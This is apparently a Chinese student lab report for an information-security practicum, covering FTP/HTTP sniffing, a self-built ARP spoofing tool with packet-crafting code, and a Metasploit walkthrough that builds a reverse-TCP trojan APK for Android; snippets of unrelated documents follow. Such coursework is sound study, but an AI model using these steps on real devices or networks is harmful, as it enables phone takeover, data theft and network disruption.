课程编号:B

Size: px
Start display at page:

Download "课程编号:B"

Transcription

1 课程编号 :B 信息安全工程实践 4 实践报告 姓名薛旗学号 班 级 软信 指 导 教 师 王冬琦 开 设 学 期 第二学期 开 设 时 间 第 1 周 第 3 周 报 告 日 期 评 定 人 评 定 成 绩 评 定 日 期 东北大学软件学院

2 实验 1 协议分析和网络嗅探 1. 实践内容 1) 通过使用 Sniffer Pro 软件掌握 Sniffer( 嗅探 ) 工具的使用方法, 实现捕捉 FTP HTTP 等协议的数据包 ; 2) 理解 TCP/IP 协议中多种协议的数据结构 会话连接建立和终止的过程 ; 3) 了解 FTP HTTP 等协议明文传输特性, 增强安全意识 2. 实践过程 2.1 搭建 FTP 服务器 ( 工具 :FileZilla Server) (1) 初始化及配置 (2) 设置用户账户 (3) 设置共享文件夹路径, 配置权限 (4) 配置成功

3 2.2 登陆并测试 FTP 服务器 (1) 打开浏览器, 连接远程 FTP 服务器 (2) 输入帐户密码, 登陆 FTP 服务器 (3) 登陆成功, 可查看该共享文件夹下内容 (4) 用户连接信息显示在服务器窗口 2.3 协议分析及网络嗅探 ( 工具 :Sniffer Pro) (1) 打开 Sniffer Pro, 显示主界面 (2) 定义过滤器 : 只抓取 FTP 数据

4 (3) 定义过滤器 : 指定希望捕获的 IP 地址 (4) 定义好的过滤器, 开始抓包 (5)Traffic Map 视图 (6)Decode 页面 (7) 其他信息 (8) 类似以上步骤, 捕获 HTTP 数据包

5 实验 2 ARP 攻击的设计与实现 1. 实践内容 1) 设计并实现 ARP 攻击 2) 可以设计并实现其他攻击 2. 实践过程 2.1 ARP 攻击原理分析 ARP 数据报格式 ARP 工作原理 ARP(Address Resolution rotocol, 地址解析协议 ) 是将 IP 地址解析为以太网 MAC 地 址 ( 或称物理地址 ) 的协议 (1)A 先在其 ARP 高速缓存中查看有无 B 的 IP 地址 如有, 就在 ARP 高速缓存中查出 其对应的硬件地址, 再把这个硬件地址写入 MAC 帧, 然后通过局域网把该 MAC 帧发往此 硬件地址 如果查不到 B 的 IP 的项目, 则进入第 (2) 步 (2)A 的 ARP 进程在本局域网上广播发送一个 ARP 请求分组, 主要内容是 A 自己的 IP 地址 MAC 地址, 询问的 IP 地址 ( 也就是 B 的 IP 地址 ) (3) 在本局域网上的所有主机运行的 ARP 进程都收到此 ARP 请求分组 (4) 主机 B 的 IP 地址与 ARP 请求分组中要查询的 IP 地址一致, 就收下这个 ARP 请求分 组, 并向 A 单播发送 ARP 响应分组 ( 其中写入了 B 自己的硬件地址 ), 同时将 A 的地址映 射写入自己的 ARP 高速缓存中 由于其余的所有主机 IP 地址都与 ARP 请求分组要查询的 IP 地址不一致, 因此都不理睬这个 ARP 请求分组 的映射 (5)A 收到 B 的 ARP 响应分组后, 就在其 ARP 高速缓存中写入 B 的 IP 地址到硬件地址 至此,A 得到了从 B 的 IP 地址到其 MAC 地址的映射 当这个映射项目在高速缓存中 保存超过生存时间, 将被从高速缓存中删除 ARP 欺骗原理 : ARP 自动学习的目的, 就是通讯的双方主机互相请求 / 告知 MAC 地址, 并以此完成二层的以太网帧交换, 由于通讯的双向性, 很显然如果任何一方的 ARP 信息是空或者错误的, 那么通讯就会失败 而 ARP 欺骗的目的就是频繁的发送错误消息欺骗网络通信的任何一方, 最终导致不能正常通信

6 2.2 ARP 攻击模块部分 程序初始化 int get_ip_by_domain(const char *domain, char *ip); // 根据域名获取 ip int get_local_mac(const char *eth_inf, char *mac); // 获取本机 mac int get_local_ip(const char *eth_inf, char *ip); // 获取本机 ip 伪代码 : // 根据域名获取 ip int get_ip_by_domain(const char *domain, char *ip){ hptr = gethostbyname(domain);... for(pptr = hptr->h_addr_list ; *pptr!= NULL; pptr++){ if (NULL!= inet_ntop(hptr->h_addrtype, *pptr, ip, IP_SIZE) ){ return -1; // 获取本机 mac return 0; // 只获取第一个 ip int get_local_mac(const char *eth_inf, char *mac){... sd = socket(af_inet, SOCK_DGRAM, 0); strncpy(ifr.ifr_name, eth_inf, sizeof(ifr.ifr_name) - 1);... snprintf(mac, MAC_SIZE, "%02x:%02x:%02x:%02x:%02x:%02x", (unsigned char)ifr.ifr_hwaddr.sa_data[0], (unsigned char)ifr.ifr_hwaddr.sa_data[1], (unsigned char)ifr.ifr_hwaddr.sa_data[2], (unsigned char)ifr.ifr_hwaddr.sa_data[3], (unsigned char)ifr.ifr_hwaddr.sa_data[4], (unsigned char)ifr.ifr_hwaddr.sa_data[5]);

7 close(sd); return 0; // 获取本机 ip int get_local_ip(const char *eth_inf, char *ip){... sd = socket(af_inet, SOCK_DGRAM, 0);... strncpy(ifr.ifr_name, eth_inf, IFNAMSIZ); ifr.ifr_name[ifnamsiz - 1] = 0;... memcpy(&sin, &ifr.ifr_addr, sizeof(sin)); snprintf(ip, IP_SIZE, "%s", inet_ntoa(sin.sin_addr)); close(sd); return 0; 选择网络接口 查找最合适接口 :device = pcap_lookupdev(errbuf); 加载全部设备列表 :ret = pcap_findalldevs(&it,errbuf); 设置扫描网段, 扫描活跃主机 : 启用多线程, 防止扫描界面卡死 创建类 MyThread, 公有继承自 QThread, 通过重写 run() 方法来处理网段扫描 扫描 :temp_str = "nmap -sp " + globle_ip_segment + " -T5"; ARP 缓存表重定向 :system("cat /proc/net/arp > list.txt"); 从文件读取 ARP 缓存表并打印 : QTextStream in(&file); QString line = in.readline(); while (!line.isnull()){ line = in.readline(); ui->net_info_wid->additem(new QListWidgetItem(QString(line))); 设置参数 void get_ip_mac(qstring str); // 正则匹配, 得到 IP 和 MAC 伪代码 : // 正则匹配 IP QRegExp ip_rx("(\\d{1,3)\\.(\\d{1,3)\\.(\\d{1,3)\\.(\\d{1,3)"); int pos = str.indexof(ip_rx); if(pos >= 0){ temp = ip_rx.cap(0);

8 reg_ip = ip_rx.cap(0); // 正则匹配 MAC QRegExp max_rx("([0-9a-f]{2):([0-9a-f]{2):([0-9a-f]{2):([0-9a-f]{2):([0-9a-f]{2):([0-9a-f]{2)"); pos = str.indexof((max_rx)); if(pos >= 0){ temp = max_rx.cap(1); reg_mac = max_rx.cap(0); 构造 ARP 包伪代码 : // 构造以太网首部目标 MAC 地址及以太网 ARP 字段目标 MAC 地址 for(i = 0; i < 6; i++){ temp_trans += "0x" + max_rx.cap(flag++); str_cheat_host = temp_trans.tostdstring(); packet[i] = strtoul(str_cheat_host.c_str(),0,0); packet[i + 32] = packet[i]; temp_trans = ""; // 以太网源地址 flag = 1; pos = host_mac.indexof((max_rx)); if(pos >= 0){ for(i = 6; i < 12; i++){ // 帧类型 packet[12]=0x08; packet[13]=0x06; // 硬件类型 packet[14]=0x00; packet[15]=0x01; // 协议类型 packet[16]=0x08; packet[17]=0x00; // 硬件地址长度 packet[18]=0x06; // 以太网 arp 字段目标 MAC 地址 temp_trans += "0x" + max_rx.cap(flag++); str_insert_mac = temp_trans.tostdstring(); // 以太网首部目标 MAC 地址 packet[i] = strtoul(str_insert_mac.c_str(),0,0); // 以太网首部源 MAC 地址 temp_trans = "";

9 // 协议地址长度 packet[19]=0x04; //option 字段 packet[20]=0x00; packet[21]=0x02; //ARP 字段发送者 MAC 地址 flag = 1; QString insert_mac = ui -> insert_mac -> text(); pos = insert_mac.indexof((max_rx)); if(pos >= 0){ for(i = 22; i< 28; i++){ temp_trans += "0x" + max_rx.cap(flag++); str_insert_mac = temp_trans.tostdstring(); packet[i] = strtoul(str_insert_mac.c_str(),0,0); //ARP 字段首部源 MAC 地址 temp_trans = ""; // 发送者 IP( 假冒的 IP) flag = 1; QRegExp ip_rx("(\\d{1,3)\\.(\\d{1,3)\\.(\\d{1,3)\\.(\\d{1,3)"); flag = 1; QString insert_ip = ui -> insert_ip -> text(); pos = insert_ip.indexof((ip_rx)); if(pos >= 0){ for(i = 28; i< 32; i++){ temp_trans = ip_rx.cap(flag++); str_insert_ip = temp_trans.tostdstring(); packet[i] = atoi(str_insert_ip.c_str()); temp_trans = ""; //arp 字段目标 ip flag = 1; pos = reg_des_ip.indexof((ip_rx)); if(pos >= 0){ for(i = 38; i< 42; i++){ temp_trans = ip_rx.cap(flag++); str_reg_des_ip = temp_trans.tostdstring(); packet[i] = atoi(str_reg_des_ip.c_str()); temp_trans = "";

10 // 数据填充 for(i = 42; i < 60; i++){ packet[i]=0x00; 执行攻击启用多线程, 防止扫描界面卡死 创建类 CheatThread, 公有继承自 QThread, 通过重写 run() 方法来处理网段扫描 cheat_fun.start(); while(attack_flag){ pcap_sendpacket(adhandle, packet,60 ); sleep(2); 抓包审查 for(i=0;i<60;i++){ sprintf(buf, "%02x ",packet[i]); str_out_put = buf; qstr_out_put += QString::fromStdString(str_out_put); ui -> output_info -> setplaintext(qstr_out_put); 2.3 嗅探统计部分 底层模块 ( 数据包捕获 ) (1) 通过 Libpcap 提供的网络数据包捕获接口, 捕获流经本网卡的所有原始数据包 本实验设计的底层模块的初始化工作在函数 pcap_t* open_pcap_socket(char* device, const char* bpfstr) 中, 定义的回调函数为 void capture_loop(pcap_t* pd, int packets, pcap_handler func), 捕获的数据包处理主函数为 void parse_packet(u_char *user, struct pcap_pkthdr *packethdr,u_char *packetptr) (2) 数据包捕获步骤及函数说明 a. 网络设备查找 char *pcap_lookupdev(char *errbuf) 获取可被函数调用的网络设备名指针 b. 打开网络设备 pcap_t *pcap_open_live(char *device, int snaplen, int promisc, int to_ms, char *ebuf) 获得用于捕获网络数据包的数据包捕获描述字 c. 获取网络参数 int pcap_lookupnet(char *device, bpf_u_int32 *netp,bpf_u_int32 *maskp,

11 char *errbuf) 获得指定网络设备的网络号和掩码 d. 编译过滤策略 int pcap_compile(pcap_t *p, struct bpf_program *fp,char *str, int optimize, bpf_u_int32 netmask) 将 str 参数指定的字符串编译到过滤程序中 e. 设置过滤器 int pcap_setfilter(pcap_t *p, struct bpf_program *fp) 指定一个过滤程序 f. 利用回调函数捕获数据包 int pcap_loop(pcap_t *p, int cnt,pcap_handler callback, u_char *user) 捕获并处理数据包 g. 关闭网络设备 void pcap_close(pcap_t *p) 关闭 p 参数相应的文件, 并释放资源 中层模块 (MAC 层处理模块,IP 层处理模块,TCP 处理模块,UDP 处理模块,ICMP 处理模块 ) 息 (1) 模块结构 void print_ethernet(struct ether_header* eth) void print_arp(struct ether_arp *arp) void print_ip(struct ip *ip) 显示以太网帧头部结构信 显示 arp 报头结构信息 显示 ip 报头结构信息 void print_tcp(struct tcphdr *tcp) 显示 tcp 报头结构信息 void print_udp(struct udphdr *udp) 显示 udp 报头结构信息 void print_icmp(struct icmp *icmp) 显示 icmp 报头结构信息 void dump_packet(unsigned char * buff, int len) 来表示 将从 Ethernet 报头的初始地址到 FCS 之前的值使用十六进制整数和 ASCII 码 char *mac_ntoa(u_char *d) char *ip_ttoa(int flag) char *ip_ftoa(int flag) char *tcp_ftoa(int flag) (2) 实现方法 将 MAC 地址变换为字符串 将 IP 报头中的标志变换为 ASCII 码辅助函数 将 IP 报头中的标志变换为 ASCII 码辅助函数 将 TCP 报头中的标志变换为 ASCII 码辅助函数 通过 Libpcap 提供的网络数据包捕获接口捕获流经本网卡的所有原始数据包 在回调函数中循环处理捕获的数据包. 首先, 开始处理 Ethernet 的报头 检查 Ethernet 类型之后, 分析进行 ARP 协议 IP 协议 其他协议的处理 如果为 IP 协议, 则进一步地进行 IP 报头的处理, 然后, 分别进行下面的 TCP 协议 UDP 协议 ICMP 协议 其他协议等的任一处理 如果判明了协议类型, 则按照命令行可选域的指示, 显示相关的报头 报头的显示在传输层一级上知道了包的种类之后进行 并且, 按照 Ethernet 报头的顺序进行显示

12 2.3.3 上层统计处理模块 ( 数据包统计模块, 数据包协议统计模块, 网络元发现模块, 数据包构造模块, 数据包过滤模块 ) (1) 相关函数 : void parse_packet(u_char *user, struct pcap_pkthdr *packethdr,u_char *packetptr) 统计变量寄存位置 有 : void bailout(int signo) 打印并输出统计信息 int main(int argc, char **argv) 开始时间统计变量寄存位置 (2) 主要功能 a. 网络元发现 : 发现网络上的主机 b. 数据包统计模块及数据包协议统计模块. 本次实验中统计模块包含的统计信息 开始时间, 结束时间, 运行时间, 捕获的所有数据包, 丢弃的数据包, 数据包捕获 速度, 网络超长帧, 网络超短帧, 数据帧大小 (MAC Bytes), 捕获数据帧速率 (bits/s),arp 数据包,IP 数据包,TCP 数据包,UDP 数据包,ICMP 数据包,RARP 数据包, 其他数据包 c. 设计过滤规则. 根据过滤条件对数据包进行过滤. 本次实验中实现了对不同协议 的数据包进行过滤

13 2.3.4 流程图 开始 ETHERTYPE_ARP 显示 Ethernet 报头 显示 ARP 包 显示 Ethernet 报头 显示 IP 报头 检查命令行的一个可行域 打开一个数据链路访问接口 pcap_loop 循环抓包 处理包 检查 Ethernet 的类型 检查 IP 协议的类型 显示 Ethernet 报头显示 Ethernet 报头显示 Ethernet 报头 显示 IP 报头显示 IP 报头显示 IP 报头 显示 TCP 包头显示 UDP 报头显示 ICMP 报头显示 unknown 报头 显示包的 dump pcap_loo p 循环结束 ETHERTYPE_IP IPPROTO_TCP IPPROTO_UDP IPPROTO_ICMP 其它 其它 显示 Ethernet 报头 显示 unknown

14 2.3 成果展示 主界面 (1) 嗅探界面 (2) 统计界面 (3)ARP 攻击操作界面 (4) 关于界面

15 2.3.2 ARP 攻击操作界面介绍 1 适配器 : 选择将要扫描的网络接口 其中点选默认即加载最佳适配的网络接口, 加载全部 则加载当前设备所有接口 2 扫描网段 : 默认局域网段设置为 /24, 其中 24 为子网掩码的前缀表示法, 标识 子网掩码, 代表数字 1 的个数 24 即 24 个 1, 转化为点分十进制为 该扫描 网段需要用户根据实际情况设定 点击 开始扫描 则从设定的网段开始扫描局域网内活跃 的主机, 并更新 ARP 缓存表 3 活跃主机列表 : 扫描出来的活跃主机信息将显示在该列表中 4 欺骗对象 : 分为单播和广播两种 单播只针对局域网内一台主机, 广播则针对局域网内所 有主机 点击广播则会默认设置字段为 FF:FF:FF:FF:FF:FF 若选择单播, 则可以通过双击 活跃主机列表中的主机快速填入设置字段 该字段的值会自动添加到 ARP 数据报文结构中 的以太网首部目的 MAC 地址和 ARP 请求 / 应答字段中目的以太网 MAC 地址 5 欺骗 IP: 冒充的 IP 地址 该字段将会自动添加到 ARP 请求 / 应答字段中的发送端 IP 地址 可通过双击活跃主机列表中的主机快速填入 6 伪造 Mac 地址 : 将要伪造的 MAC 地址 该字段会自动添加到 ARP 请求 / 应答字段中的发 送端以太网地址 可通过双击活跃主机列表中的主机快速填入 7ARP 包详细信息 : 发送的 ARP 数据报各字段详细信息将展示在该窗口 8 命令控件 : 构造好 ARP 数据报后, 点击 执行 则开始发起 ARP 攻击 ; 点击 停止 则停止 ARP 攻击 ; 点击 清除日志 则清空当前日志信息 9 设备信息 : 启动程序后, 自动扫描设备信息, 显示推荐的适配网络接口 本机 IP 及本机 MAC 10 操作日志 : 显示用户操作的日志信息及状态提示

16 2.3.3 步骤演示 : 预操作 : 查看预攻击目标在未遭受 ARP 攻击下的 ARP 缓存表 ( 通过比较攻击前后 ARP 缓 存表信息, 来确定是否攻击成功 ) (1) 启动主程序 系统初始化, 加载设备信息, 并将设备运行情况加载在操作日志中 (2) 选择网络接口 程序初始化后将会提供一个默认最优接口 用户也可以选择 加载全 部 加载设备所有接口, 自主选择扫描接口 (3) 设置扫描网段 程序启动后将会加载默认的扫描网段 用户也可根据实际情况自行设 置 (4) 开始扫描 点击 开始扫描 则从设定的网段开始扫描局域网内活跃的主机, 并更新 ARP 缓存表 扫描出的活跃主机信息将加载在列表中

17 (5) 依次选择欺骗对象 欺骗 IP 及伪造的 Mac 地址 三者都可通过双击活跃主机列表中 的主机快速填入

18 (6) 开始执行 ARP 攻击 发送的 ARP 数据报各字段详细信息将展示在 ARP 包详细信息窗 口 (7) 查看数据报详细信息 转到 嗅探 界面, 选择过滤规则, 配置其他选项, 点击 运 行, 开始抓包 获取的包信息将展示在详细界面

19 (8) 查看攻击效果 可以看到, 被攻击目标的 ARP 缓存表已发生改变, 欺骗 IP 对应的 Mac 地址以被改为伪造的 MAC 地址 00:00:00:00:00:00

20 (9) 停止攻击 可看到在操作日志处已更新信息 (10) 同以上步骤, 重新选择欺骗对象 欺骗 IP 及伪造的 Mac 地址, 重新发起 ARP 攻击 此次欺骗对象为网关, 欺骗 IP 为局域网内的某台主机, 使其上不了网

21 (11) 再次查看攻击效果 发现目标主机已无法上网 (12) 转到 统计 页面, 可查看统计信息

22 (13) 关于页面 ARP 攻击防范方法 (1) 静态绑定 对每台主机进行 IP 和 MAC 地址静态绑定 (2) 使用 ARP 防护软件, 善用 ARP 防火墙和 ARP 病毒查杀软件 (3) 采用 VLAN 技术隔离端口, 将 VLAN 和交换机端口绑定 通过划分 VLAN 和交换机 端口绑定, 防范 ARP 攻击 (4) 禁用某个网络接口做 ARP 解析

23 实验 3 新的网络攻击手段的论述 1. 简介 随着智能手机的普及, 以智能手机为平台的应用软件越来越多, 这些软件极大丰富了人 们的生活, 带给人们极大的便利 但是伴随着手机软件的爆炸式增长, 一些恶意软件也大量 出现在互联网上, 骗取用户下载安装, 危害用户移动设备安全 近些年, 以安卓系统为平台 的设备与日俱增, 伴随着市场占有率的快速上涨, 其安全性也引发了极大的关注 同时因为 安卓系统的开源性, 更加方便了不法分子编写安卓平台恶意软件, 非法获取用户信息 本实 验将模拟针对安卓设备的网络攻击, 通过生成恶意软件, 诱导用户安装 ( 通过链接或软件捆 绑 ), 从而达到监听用户数据, 后台获取用户信息的目的 2. 攻击原理 通过 Metasploit Framework(MFS) 生成木马文件, 通过链接或恶意软件捆绑, 诱导用户下 载安装, 从而入侵 Android 手机 3. 工作过程或步骤流程 ( 所用工具介绍 ) 工具 操作系统 :Kali Linux 使用工具 : Metasploit Framework(MSF) 工具介绍 :MetasploitFramework 是一套针对远程主机进行开发和执行 exploit 代码 的 使用步骤 : (1) 选择并配置一个攻击代码 (exploit), 利用漏洞来进入目标系统 (2) 检测目标系统是否会被此代码影响 (3) 选择并配置有效载荷 (payload), 成功入侵系统后在目标系统执行代码 (4) 选择编码方式 (5) 执行攻击代码

24 详细操作步骤 : (1) 打开终端, 查看本地 IP 地址 >> ifconfig 通过指定接口, 可以看到本地 IP 地址为 (2) 使用 msfvenom 工具生成 apk 木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=6666 R > /root/hack.apk 参数详解 : -p 指定需要使用的 payload( 攻击载荷 ), 是系统被攻陷后执行的操作 通常攻击载荷附 加于漏洞攻击模块之上, 随漏洞攻击一起分发 singles: 自包含, 完全独立, 类似小的可执行文件 stagers: 攻击者和被攻击者之间建立网络连接 stages:stagers 模块下载的载荷组件 -LPORT: 接收反弹 Shell 的主机, 即本地 IP 地址 -LPORT: 接收反弹 Shell 主机的监听端口 /root/hack.apk: 生成木马文件 apk 目录 (3) 打开 postgresql 数据库 >> service postgresql start (4) 初始化数据库服务 >> msfdb init (5) 启动 metasploit 控制台 >> msfconfole

25 (6) 加载模块 >> use exploit/multi/handler (7) 选择 payload( 攻击载荷 ) >> set payload android/meterpreter/reverse_tcp (8) 查看参数 >> show options (9) 设置参数, 将 LHOST 设置为本地 IP, 即 ; 将 LPORT 设置为刚才设置的 监听端口 6666 >> set LHOST >> set LPORT 6666

26 (10) 查看参数是否设置成功 >> show options (11) 将 hack.apk 安装到手机 (12) 执行漏洞, 开始监听, 等待手机上线 待手机执行该应用时, 将自动连接会话 >> exploit 至此入侵系统成功 4. 功能或后果 入侵系统成功后, 恶意软件将会建立 TCP 连接, 攻击方将会通过 msfconfole 控制终端远 程操控用户设备, 获取用户信息 (1) 查看入侵系统信息 >> sysinfo

27 (2) 查看更多指令 >> help (3) 通过相关指令即可获得相关信息

28 5. 防范手段与措施 (1) 购买手机或者下载安装 APP, 最好通过官方 正规渠道, 尽量不要通过第三方销售平台或者第三方应用商店, 防止软件后门及恶意软件捆绑 (2) 要特别注意不要轻易点击下载具有诱导性质的链接或者弹窗提供的 APP, 防止下载到恶意软件, 造成数据泄露 (3) 在使用手机的过程中, 要善用安全管理软件, 在安装软件时对应用程序及安装包 进行安全扫描, 确保软件安全再进行安装 (4) 如果对设备有高安全性需要, 应当对设备添加密码保护, 要对设备进行及时备份 (5) 注意应用申请的权限信息, 是否存在申请过多权限的问题 (6) 尽可能的升级操作系统, 防止漏洞利用 (7) 关注进程列表, 确保只有受信任进程运行 如果发现未知进程, 考虑移除进程并 对手机进行病毒查杀 6. 结论 ( 个人观点 ) 在大数据大安全时代, 移动终端设备面临的威胁日益增多 : 恶意软件层出不穷, 方法手 段更加隐蔽, 诈骗电话 欺诈短信 钓鱼链接 木马病毒 勒索软件等, 给移动终端用户带 来很多安全问题 因此用户在这个时代背景下, 需要提高自己的辨别能力, 不去点击可疑链 接, 不访问不正当内容, 不轻信诱导性软件提供的信息, 不随便扫街边二维码, 以防恶意软 件在后台偷偷下载安装运行, 导致手机崩溃或信息泄露

29 实践总结 1. 参考资料 David Kennedy, Jim O Gorman 等著 : Metasploit 渗透测试指南, 电子工业出版社, 实践总结通过实验一, 我学会了使用 Sniffer Pro 软件, 并通过该软件进行协议分析和网络嗅探, 知道了如何捕获 FTp HTTP 等协议的数据包, 理解了 TCP/IP 协议中多种协议的 数据结构 会话连接建立和终止的过程 同时在实践过程中, 学会了自己搭建 FTP 服 务器 通过实验二, 我掌握了 ARP 协议的攻击原理, 并通过 QT 设计了一款能够实现 ARP 攻击的图形界面软件, 提出了防范 ARP 攻击的方法, 将理论知识运用于实践 在本实 验的基础上, 我进行了一些拓展, 实现了通过利用 Libpcap 提供的网络数据包捕获接口 捕获流经本网卡的所有原始数据包, 并在此基础上对捕获的数据包进行统计分析 与此 同时了解了如何通过编写过滤条件, 对网络数据包进行过滤, 提取出所关心的网络数据 本实验对我的编程能力和综合能力有很大的提升 通过实验三, 我针对互联网上恶意软件泛滥的问题, 通过 Metasploit Framework(MSF) 模拟实现了 Android 系统下木马 APK 文件生成及渗透入侵 监听用户 数据 非法获取用户数据信息的过程, 懂得了攻击原理及后果, 并提出了防范手段及措 施, 对自身实践能力有很大的提升 总之, 通过本次实验, 将平时上课所学理论知识转化为了实践, 不仅提高了自身的 编程能力, 还提高了自己解决问题和思维的能力, 获益匪浅 希望多多开设这样的实践 课, 在实践中提升自己的综合能力

30 评价表格 : 考核标准 得分 (1) 实现实践要求基本内容 (60%); (2) 实验过程中, 具有严谨的学习态度和认真 踏实 一丝不苟的科学作风 (10%); (3) 所做实验具有一定的创新性 (20%); (4) 实验报告规范 (10%)

Chapter #

Chapter # 第三章 TCP/IP 协议栈 本章目标 通过本章的学习, 您应该掌握以下内容 : 掌握 TCP/IP 分层模型 掌握 IP 协议原理 理解 OSI 和 TCP/IP 模型的区别和联系 TCP/IP 介绍 主机 主机 Internet TCP/IP 早期的协议族 全球范围 TCP/IP 协议栈 7 6 5 4 3 应用层表示层会话层传输层网络层 应用层 主机到主机层 Internet 层 2 1 数据链路层

More information

计算机网络实验说明

计算机网络实验说明 计算机网络实验说明 龚旭东 电三楼 420 lzgxd@mailustceducn 2011 年 11 月 1 日 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 1 / 20 Outline 1 实验系统介绍 实验环境实验流程 2 实验内容编程实验交互实验观察实验 3 一些控制台命令 4 实验报告说明 龚旭东 (TA) 计算机网络实验说明 2011 年 11 月 1 日 2

More information

C6_ppt.PDF

C6_ppt.PDF C01-202 1 2 - (Masquerade) (Replay) (Message Modification) (Denial of Service) - ( ) (Eavesdropping) (Traffic Analysis) 8 1 2 7 3 6 5 4 3 - TCP SYN (SYN flood) Smurf Ping of Death LAND Attack Teardrop

More information

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP #

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP # iptables 默认安全规则脚本 一 #nat 路由器 ( 一 ) 允许路由 # iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT ( 二 ) DNAT 与端口转发 1 启用 DNAT 转发 # iptables -t nat -A PREROUTING -p tcp -d 192.168.102.37 dprot 422 -j DNAT to-destination

More information

目 录(目录名)

目  录(目录名) 目录 目录...1-1 1.1 域名解析配置命令... 1-1 1.1.1 display dns domain... 1-1 1.1.2 display dns dynamic-host... 1-1 1.1.3 display dns server... 1-2 1.1.4 display ip host... 1-3 1.1.5 dns domain... 1-4 1.1.6 dns resolve...

More information

胡 鑫 陈兴蜀 王海舟 刘 磊 利用基于协议分析和逆向工程的主动测量方法对 点播系统进行了研究 通过对 点播协议进行分析 获悉该协议的通信格式和语义信息 总结出了 点播系统的工作原理 在此基础上设计并实现了基于分布式网络爬虫的 点播系统主动测量平台 并对该平台获取的用户数据进行统计分析 获得了 点播系统部分用户行为特征 研究结果对 点播系统的监控及优化提供了研究方法 点播 协议分析 爬虫 主动测量

More information

C++ 程序设计 告别 OJ1 - 参考答案 MASTER 2019 年 5 月 3 日 1

C++ 程序设计 告别 OJ1 - 参考答案 MASTER 2019 年 5 月 3 日 1 C++ 程序设计 告别 OJ1 - 参考答案 MASTER 2019 年 月 3 日 1 1 INPUTOUTPUT 1 InputOutput 题目描述 用 cin 输入你的姓名 ( 没有空格 ) 和年龄 ( 整数 ), 并用 cout 输出 输入输出符合以下范例 输入 master 999 输出 I am master, 999 years old. 注意 "," 后面有一个空格,"." 结束,

More information

目录 1 IP 地址配置命令 IP 地址配置命令 display ip interface display ip interface brief ip address i

目录 1 IP 地址配置命令 IP 地址配置命令 display ip interface display ip interface brief ip address i 目录 1 IP 地址配置命令... 1-1 1.1 IP 地址配置命令... 1-1 1.1.1 display ip interface... 1-1 1.1.2 display ip interface brief... 1-3 1.1.3 ip address... 1-4 i 1 IP 地址配置命令 1.1 IP 地址配置命令 1.1.1 display ip interface 命令 display

More information

C语言课程设计

C语言课程设计 课程编号 :B080209020 信息安全工程实践 2 -- 网络程序设计实践报告 学号 20155362 姓名薛旗 班级软信 -1503 指导教师王学毅 程序实践名称 程序实践内容 信息安全工程实践 2- 网络程序设计 网络程序设计 开设学期 2 0 1 6-2 0 1 7 第二学期 开设时间第 17 周 第 19 周 报告日期 2017 年 7 月 7 日 评定成绩 评定人签字 评定日期 东北大学软件学院

More information

计算机网络 实验指导书 / 实验四 : 动态路由协议 实验四 : 动态路由协议 一 实验目的 1 进一步理解路由器的工作原理; 2 掌握 RIP 的基本原理和实现 ; 3 掌握 OSPF 的基本原理和实现 二 实验学时 2 学时 三 实验类型 综合性 四 实验需求 1 硬件每人配备计算机 1 台 2

计算机网络 实验指导书 / 实验四 : 动态路由协议 实验四 : 动态路由协议 一 实验目的 1 进一步理解路由器的工作原理; 2 掌握 RIP 的基本原理和实现 ; 3 掌握 OSPF 的基本原理和实现 二 实验学时 2 学时 三 实验类型 综合性 四 实验需求 1 硬件每人配备计算机 1 台 2 实验四 : 动态路由协议 一 实验目的 1 进一步理解路由器的工作原理; 2 掌握 RIP 的基本原理和实现 ; 3 掌握 OSPF 的基本原理和实现 二 实验学时 2 学时 三 实验类型 综合性 四 实验需求 1 硬件每人配备计算机 1 台 2 软件 Windows 7 以上操作系统, 安装 GNS3 网络仿真与 VirtualBox 虚拟化软件, 安装 Putty 软件 3 网络实验室局域网支持,

More information

目录 1 IPv6 PIM Snooping 配置命令 IPv6 PIM Snooping 配置命令 display pim-snooping ipv6 neighbor display pim-snooping ipv6 routing-ta

目录 1 IPv6 PIM Snooping 配置命令 IPv6 PIM Snooping 配置命令 display pim-snooping ipv6 neighbor display pim-snooping ipv6 routing-ta 目录 1 IPv6 PIM Snooping 配置命令 1-1 1.1 IPv6 PIM Snooping 配置命令 1-1 1.1.1 display pim-snooping ipv6 neighbor 1-1 1.1.2 display pim-snooping ipv6 routing-table 1-2 1.1.3 display pim-snooping ipv6 statistics

More information

ch09.PDF

ch09.PDF 9-1 / (TCP/IP) TCP/IP TCP/IP ( ) ICMP ARP RARP 9.1 TCP/IP 9.1.1 TCP/IP OSI TCP/IP (DARPA) DARPA TCP/IP UNIX Berkeley Software DistributionTCP/IP TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP OSI - TCP/IP ( ) ( )

More information

静态分析 投放文件 行为分析 互斥量 (Mutexes) 执行的命令 创建的服务 启动的服务 进程 cmd.exe PID: 2520, 上一级进程 PID: 2556 cmd.exe PID: 2604, 上一级进程 PID: 2520 访问的文件 C:\Users\test\AppData\Lo

静态分析 投放文件 行为分析 互斥量 (Mutexes) 执行的命令 创建的服务 启动的服务 进程 cmd.exe PID: 2520, 上一级进程 PID: 2556 cmd.exe PID: 2604, 上一级进程 PID: 2520 访问的文件 C:\Users\test\AppData\Lo 魔盾安全分析报告 分析类型 开始时间 结束时间 持续时间 分析引擎版本 FILE 2016-11-25 00:20:03 2016-11-25 00:22:18 135 秒 1.4-Maldun 虚拟机机器名 标签 虚拟机管理 开机时间 关机时间 win7-sp1-x64 win7-sp1-x64 KVM 2016-11-25 00:20:03 2016-11-25 00:22:18 魔盾分数 0.0

More information

一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页

一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页 第 1 页共 32 页 crm Mobile V1.0 for IOS 用户手册 一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页 二 crm Mobile 界面介绍 : 第 3 页共 32 页 三 新建 (New) 功能使用说明 1 选择产品 第 4 页共 32 页 2 填写问题的简要描述和详细描述 第 5 页共

More information

一、

